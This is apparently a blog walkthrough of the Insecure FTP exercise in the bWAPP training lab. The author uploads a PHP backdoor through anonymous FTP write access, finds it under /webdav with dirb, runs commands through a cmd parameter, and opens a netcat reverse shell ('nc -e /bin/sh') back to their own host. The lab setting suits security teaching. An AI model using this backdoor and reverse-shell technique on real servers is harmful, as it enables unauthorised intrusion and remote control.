In bWAPP There is a Insecure FTP module where you can exploit a misconfiguration in you have the ability to write files to the server as the anonymous user.
We start off by connecting to the remote FTP server with the ftp utility.
sam@ubuntu:~$ ftp 192.168.56.101 Connected to 192.168.56.101. 220 ProFTPD 1.3.1 Server (bee-box) [192.168.56.101] Name (192.168.56.101:sam): anonymous 331 Anonymous login ok, send your complete email address as your password Password: 230 Anonymous access granted, restrictions apply Remote system type is UNIX. Using binary mode to transfer files. ftp> ls 200 PORT command successful 150 Opening ASCII mode data connection for file list -rw-rw-r-- 1 root www-data 543803 Nov 2 2014 Iron_Man.pdf -rw-rw-r-- 1 root www-data 462949 Nov 2 2014 Terminator_Salvation.pdf -rw-rw-r-- 1 root www-data 544600 Nov 2 2014 The_Amazing_Spider-Man.pdf -rw-rw-r-- 1 root www-data 526187 Nov 2 2014 The_Cabin_in_the_Woods.pdf -rw-rw-r-- 1 root www-data 756522 Nov 2 2014 The_Dark_Knight_Rises.pdf -rw-rw-r-- 1 root www-data 618117 Nov 2 2014 The_Incredible_Hulk.pdf -rw-rw-r-- 1 root www-data 5010042 Nov 2 2014 bWAPP_intro.pdf 226 Transfer complete ftp> pwd 257 "/" is the current directory ftp>
Checking for write access
We are going to check for anonymous write access on the ftp server. To accomplish this we will simply 'put' a local file to the remote server.
ftp> put 1.php 1.php local: 1.php remote: 1.php 200 PORT command successful 150 Opening BINARY mode data connection for 1.php 226 Transfer complete 34 bytes sent in 0.02 secs (1.3439 kB/s) ftp> ls 200 PORT command successful 150 Opening ASCII mode data connection for file list -rw-r--r-- 1 ftp nogroup 34 Feb 4 08:11 1.php -rw-rw-r-- 1 root www-data 543803 Nov 2 2014 Iron_Man.pdf -rw-rw-r-- 1 root www-data 462949 Nov 2 2014 Terminator_Salvation.pdf -rw-rw-r-- 1 root www-data 544600 Nov 2 2014 The_Amazing_Spider-Man.pdf -rw-rw-r-- 1 root www-data 526187 Nov 2 2014 The_Cabin_in_the_Woods.pdf -rw-rw-r-- 1 root www-data 756522 Nov 2 2014 The_Dark_Knight_Rises.pdf -rw-rw-r-- 1 root www-data 618117 Nov 2 2014 The_Incredible_Hulk.pdf -rw-rw-r-- 1 root www-data 5010042 Nov 2 2014 bWAPP_intro.pdf 226 Transfer complete ftp>
As you can see the transfer was successful but we need to know the directory where we can access our '1.php' file. For this we will use 'dirb' on the remote host
sam@ubuntu:~$ dirb http://192.168.56.101 ----------------- DIRB v2.22 By The Dark Raver ----------------- START_TIME: Tue Feb 4 01:20:40 2020 URL_BASE: http://192.168.56.101/ WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt ----------------- GENERATED WORDS: 4612 ---- Scanning URL: http://192.168.56.101/ ---- + http://192.168.56.101/.bash_history (CODE:200|SIZE:83) + http://192.168.56.101/crossdomain (CODE:200|SIZE:200) + http://192.168.56.101/crossdomain.xml (CODE:200|SIZE:200) ==> DIRECTORY: http://192.168.56.101/drupal/ ==> DIRECTORY: http://192.168.56.101/evil/ + http://192.168.56.101/index (CODE:200|SIZE:45) + http://192.168.56.101/index.html (CODE:200|SIZE:588) ==> DIRECTORY: http://192.168.56.101/phpmyadmin/ + http://192.168.56.101/README (CODE:200|SIZE:2491) + http://192.168.56.101/server-status (CODE:200|SIZE:5925) ==> DIRECTORY: http://192.168.56.101/webdav/
We find a few links to possible directories where our 1.php file is stored. But if we look at the very bottom we see a webdav dirctory. If we enter in to that directory we find this.
We can issue commands to the server with our 1.php backdoor we uploaded via the anonymous write vulnerability. Lets take a look at what we have with this URL: http://192.168.56.101/webdav/1.php?cmd=id;whoami;uname%20-a
What we want is a shell with can work with better than on the URL all the time. So we will fire up netcat and do a reverse connect back shell and see if we can spawn a shell. http://192.168.56.101/webdav/1.php?cmd=nc -e /bin/sh 192.168.56.1 8088 will be our target url.
sam@ubuntu:~$ nc -nvlp 8088 Listening on [0.0.0.0] (family 0, port 8088) Connection from 192.168.56.101 50804 received! id uid=33(www-data) gid=33(www-data) groups=33(www-data)
As you can see we got a successful connect back and system shell
No comments:
Post a Comment